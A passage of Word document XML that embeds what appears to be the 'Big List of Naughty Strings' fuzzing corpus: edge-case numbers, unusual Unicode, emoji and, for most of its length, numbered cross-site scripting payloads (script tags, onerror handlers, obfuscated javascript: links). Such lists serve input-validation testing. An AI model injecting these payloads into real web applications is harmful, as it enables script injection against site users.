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Single: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">undefined | undef | null | NULL | (null) | nil | NIL | true | false | True | False | TRUE | FALSE | None | hasOwnProperty | then | constructor | \ | \ | 0 | 1 | 1.00 | $1.00 | 1/2 | 1E2 | 1E02 | 1E+02 | -1 | -1.00 | -$1.00 | -1/2 | -1E2 | -1E02 | -1E+02 | 1/0 | 0/0 | -2147483648/-1 | -9223372036854775808/-1 | -0 | -0.0 | +0 | +0.0 | 0.00 | 0..0 | . | 0.0.0 | 0,00 | 0,,0 | , | 0,0,0 | 0.0/0 | 1.0/0.0 | 0.0/0.0 | 1,0/0,0 | 0,0/0,0 | –1 | - | -. | -, | 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 | NaN | Infinity | -Infinity | INF | 1#INF | -1#IND | 1#QNAN | 1#SNAN | 1#IND | 0x0 | 0xffffffff | 0xffffffffffffffff | 0xabad1dea | 123456789012345678901234567890123456789 | 1,000.00 | 1 000.00 | 1'000.00 | 1,000,000.00 | 1 000 000.00 | 1'000'000.00 | 1.000,00 | 1 000,00 | 1'000,00 | 1.000.000,00 | 1 000 000,00 | 1'000'000,00 | 01000 | 08 | 09 | 2.2250738585072011e-308 | ,./;'[]-= | &lt;&gt;?:"|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">+ | !@#$%^&amp;()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">~ |  |  | \t \u0085             ​\u2028\u2029  　 | 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 | ﻿ |  | Ω≈ç√∫˜µ≤≥÷ | åß∂ƒ©˙∆˚¬…æ | œ∑´®†¥¨ˆøπ“‘ | ¡™£¢∞§¶•ªº–≠ | ¸˛Ç◊ı˜Â¯˘¿ | ÅÍÎÏ˝ÓÔÒÚÆ☃ | Œ„´‰ˇÁ¨ˆØ∏”’ | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">⁄€‹›ﬁﬂ‡°·‚—± | ⅛⅜⅝⅞ | ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя | ٠١٢٣٤٥٦٧٨٩ | ⁰⁴⁵ | ₀₁₂ | ⁰⁴⁵₀₁₂ |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| ' | " | '' | “” | ‘"’ | “''''"'” | “'"'"''''” | &lt;foo val=“bar” /&gt; | &lt;foo val=“bar” /&gt; | &lt;foo val=”bar“ /&gt; | &lt;foo val=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">bar' /&gt; | 田中さんにあげて下さい | パーティーへ行かないか | 和製漢語 | 部落格 | 사회과학원 어학연구소 | 찦차를 타고 온 펲시맨과 쑛다리 똠방각하 | 社會科學院語學研究所 | 울란바토르 | 𠜎𠜱𠝹𠱓𠱸𠲖𠳏 | 𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆 | 表 | ポ | あ | A | 鷗 | Œ | é | Ｂ | 逍 | Ü | ß | ª | ą | ñ | 丂 | 㐀 | 𠀀 | Ⱥ | Ⱦ | ヽ༼ຈل͜ຈ༽ﾉ ヽ༼ຈل͜ຈ༽ﾉ | (｡◕ ∀ ◕｡) | ｀ｨ(´∀｀∩ | __ﾛ(,_,*) | ・(￣∀￣)・:*: | ﾟ･✿ヾ╲(｡◕‿◕｡)╱✿･ﾟ | ,。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’ | (╯°□°）╯︵ ┻━┻) | (ﾉಥ益ಥ）ﾉ﻿ ┻━┻ | ┬─┬ノ( º _ ºノ) | ( ͡° ͜ʖ ͡°) | ¯\_(ツ)_/¯ | 😍 | 👩🏽 | 👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️ | 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 | 🐵 🙈 🙉 🙊 | ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 | ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 | 👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦 | 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 | 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 | 🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸 | 🇺🇸🇷🇺🇸🇦🇫🇦🇲 | 🇺🇸🇷🇺🇸🇦 | １２３ | ١٢٣ | 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 | בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ | הָיְתָהtestالصفحات التّحول | ﷽ | ﷺ | مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، | الكل في المجمو عة (5) | ᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜ | ᚛                 ᚜ | ‪‪test‪ | ‫test‫ |  test  | test⁠test‫ | ⁦test⁧ | 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 | ̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰ | 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 | ̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕ | Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ | ˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥ | 00˙Ɩ$- | Ｔｈｅ ｑｕｉｃｋ ｂｒｏｗｎ ｆｏｘ ｊｕｍｐｓ ｏｖｅｒ ｔｈｅ ｌａｚｙ ｄｏｇ | 𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠 | 𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌 | 𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈 | 𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰 | 𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘 | 𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐 | ⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢ | &lt;script&gt;alert(0)&lt;/script&gt; | &amp;lt;script&amp;gt;alert(&amp;#39;1&amp;#39;);&amp;lt;/script&amp;gt; | &lt;img src=x onerror=alert(2) /&gt; | &lt;svg&gt;&lt;script&gt;123&lt;1&gt;alert(3)&lt;/script&gt; | "&gt;&lt;script&gt;alert(4)&lt;/script&gt; | '&gt;&lt;script&gt;alert(5)&lt;/script&gt; | &gt;&lt;script&gt;alert(6)&lt;/script&gt; | &lt;/script&gt;&lt;script&gt;alert(7)&lt;/script&gt; | &lt; / script &gt;&lt; script &gt;alert(8)&lt; / script &gt; |  onfocus=JaVaSCript:alert(9) autofocus | " onfocus=JaVaSCript:alert(10) autofocus | ' onfocus=JaVaSCript:alert(11) autofocus | ＜script＞alert(12)＜/script＞ | &lt;sc&lt;script&gt;ript&gt;alert(13)&lt;/sc&lt;/script&gt;ript&gt; | --&gt;&lt;script&gt;alert(14)&lt;/script&gt; | ";alert(15);t=" | ';alert(16);t=' | JavaSCript:alert(17) | ;alert(18); | src=JaVaSCript:prompt(19) | "&gt;&lt;script&gt;alert(20);&lt;/script x=" | '&gt;&lt;script&gt;alert(21);&lt;/script x=' | &gt;&lt;script&gt;alert(22);&lt;/script x= | " autofocus onkeyup="javascript:alert(23) | ' autofocus onkeyup='javascript:alert(24) | &lt;script\x20type="text/javascript"&gt;javascript:alert(25);&lt;/script&gt; | &lt;script\x3Etype="text/javascript"&gt;javascript:alert(26);&lt;/script&gt; | &lt;script\x0Dtype="text/javascript"&gt;javascript:alert(27);&lt;/script&gt; | &lt;script\x09type="text/javascript"&gt;javascript:alert(28);&lt;/script&gt; | &lt;script\x0Ctype="text/javascript"&gt;javascript:alert(29);&lt;/script&gt; | &lt;script\x2Ftype="text/javascript"&gt;javascript:alert(30);&lt;/script&gt; | &lt;script\x0Atype="text/javascript"&gt;javascript:alert(31);&lt;/script&gt; | '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;\x3Cscript&gt;javascript:alert(32)&lt;/script&gt; | '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"&gt;&lt;\x00script&gt;javascript:alert(33)&lt;/script&gt; | ABC&lt;div style="x\x3Aexpression(javascript:alert(34)"&gt;DEF | ABC&lt;div style="x:expression\x5C(javascript:alert(35)"&gt;DEF | ABC&lt;div style="x:expression\x00(javascript:alert(36)"&gt;DEF | ABC&lt;div style="x:exp\x00ression(javascript:alert(37)"&gt;DEF | ABC&lt;div style="x:exp\x5Cression(javascript:alert(38)"&gt;DEF | ABC&lt;div style="x:\x0Aexpression(javascript:alert(39)"&gt;DEF | ABC&lt;div style="x:\x09expression(javascript:alert(40)"&gt;DEF | ABC&lt;div style="x:\xE3\x80\x80expression(javascript:alert(41)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x84expression(javascript:alert(42)"&gt;DEF | ABC&lt;div style="x:\xC2\xA0expression(javascript:alert(43)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x80expression(javascript:alert(44)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x8Aexpression(javascript:alert(45)"&gt;DEF | ABC&lt;div style="x:\x0Dexpression(javascript:alert(46)"&gt;DEF | ABC&lt;div style="x:\x0Cexpression(javascript:alert(47)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x87expression(javascript:alert(48)"&gt;DEF | ABC&lt;div style="x:\xEF\xBB\xBFexpression(javascript:alert(49)"&gt;DEF | ABC&lt;div style="x:\x20expression(javascript:alert(50)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x88expression(javascript:alert(51)"&gt;DEF | ABC&lt;div style="x:\x00expression(javascript:alert(52)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x8Bexpression(javascript:alert(53)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x86expression(javascript:alert(54)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x85expression(javascript:alert(55)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x82expression(javascript:alert(56)"&gt;DEF | ABC&lt;div style="x:\x0Bexpression(javascript:alert(57)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x81expression(javascript:alert(58)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x83expression(javascript:alert(59)"&gt;DEF | ABC&lt;div style="x:\xE2\x80\x89expression(javascript:alert(60)"&gt;DEF | &lt;a href="\x0Bjavascript:javascript:alert(61)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Fjavascript:javascript:alert(62)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xC2\xA0javascript:javascript:alert(63)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x05javascript:javascript:alert(64)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x18javascript:javascript:alert(66)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x11javascript:javascript:alert(67)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x88javascript:javascript:alert(68)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x89javascript:javascript:alert(69)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x80javascript:javascript:alert(70)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x17javascript:javascript:alert(71)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x03javascript:javascript:alert(72)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Ejavascript:javascript:alert(73)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Ajavascript:javascript:alert(74)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x00javascript:javascript:alert(75)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x10javascript:javascript:alert(76)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x82javascript:javascript:alert(77)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x20javascript:javascript:alert(78)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x13javascript:javascript:alert(79)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x09javascript:javascript:alert(80)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x8Ajavascript:javascript:alert(81)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x14javascript:javascript:alert(82)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x19javascript:javascript:alert(83)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xAFjavascript:javascript:alert(84)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Fjavascript:javascript:alert(85)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x81javascript:javascript:alert(86)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Djavascript:javascript:alert(87)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x87javascript:javascript:alert(88)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x07javascript:javascript:alert(89)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE1\x9A\x80javascript:javascript:alert(90)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x83javascript:javascript:alert(91)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x04javascript:javascript:alert(92)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x01javascript:javascript:alert(93)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x08javascript:javascript:alert(94)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x84javascript:javascript:alert(95)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x86javascript:javascript:alert(96)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE3\x80\x80javascript:javascript:alert(97)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x12javascript:javascript:alert(98)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Djavascript:javascript:alert(99)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Ajavascript:javascript:alert(100)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x0Cjavascript:javascript:alert(101)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x15javascript:javascript:alert(102)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA8javascript:javascript:alert(103)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x16javascript:javascript:alert(104)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x02javascript:javascript:alert(105)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Bjavascript:javascript:alert(106)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x06javascript:javascript:alert(107)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\xA9javascript:javascript:alert(108)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x80\x85javascript:javascript:alert(109)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Ejavascript:javascript:alert(110)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="\x1Cjavascript:javascript:alert(112)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x00:javascript:alert(113)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x3A:javascript:alert(114)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x09:javascript:alert(115)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x0D:javascript:alert(116)" id="fuzzelement1"&gt;test&lt;/a&gt; | &lt;a href="javascript\x0A:javascript:alert(117)" id="fuzzelement1"&gt;test&lt;/a&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Aonerror=javascript:alert(118)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x22onerror=javascript:alert(119)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Bonerror=javascript:alert(120)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Donerror=javascript:alert(121)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x2Fonerror=javascript:alert(122)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x09onerror=javascript:alert(123)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x0Conerror=javascript:alert(124)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x00onerror=javascript:alert(125)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x27onerror=javascript:alert(126)&gt; | </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">"'&gt;&lt;img src=xxx:x \x20onerror=javascript:alert(127)&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x3Bjavascript:alert(128)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Djavascript:alert(129)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xEF\xBB\xBFjavascript:alert(130)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x81javascript:alert(131)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x84javascript:alert(132)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE3\x80\x80javascript:alert(133)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x09javascript:alert(134)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x89javascript:alert(135)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x85javascript:alert(136)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x88javascript:alert(137)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x00javascript:alert(138)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\xA8javascript:alert(139)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x8Ajavascript:alert(140)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE1\x9A\x80javascript:alert(141)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Cjavascript:alert(142)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x2Bjavascript:alert(143)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xF0\x90\x96\x9Ajavascript:alert(144)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;-javascript:alert(145)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x0Ajavascript:alert(146)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\xAFjavascript:alert(147)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\x7Ejavascript:alert(148)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x87javascript:alert(149)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x81\x9Fjavascript:alert(150)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\xA9javascript:alert(151)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xC2\x85javascript:alert(152)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xEF\xBF\xAEjavascript:alert(153)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x83javascript:alert(154)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt;&lt;script&gt;\xE2\x80\x8Bjavascript:alert(155)&lt;/script&gt; | "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
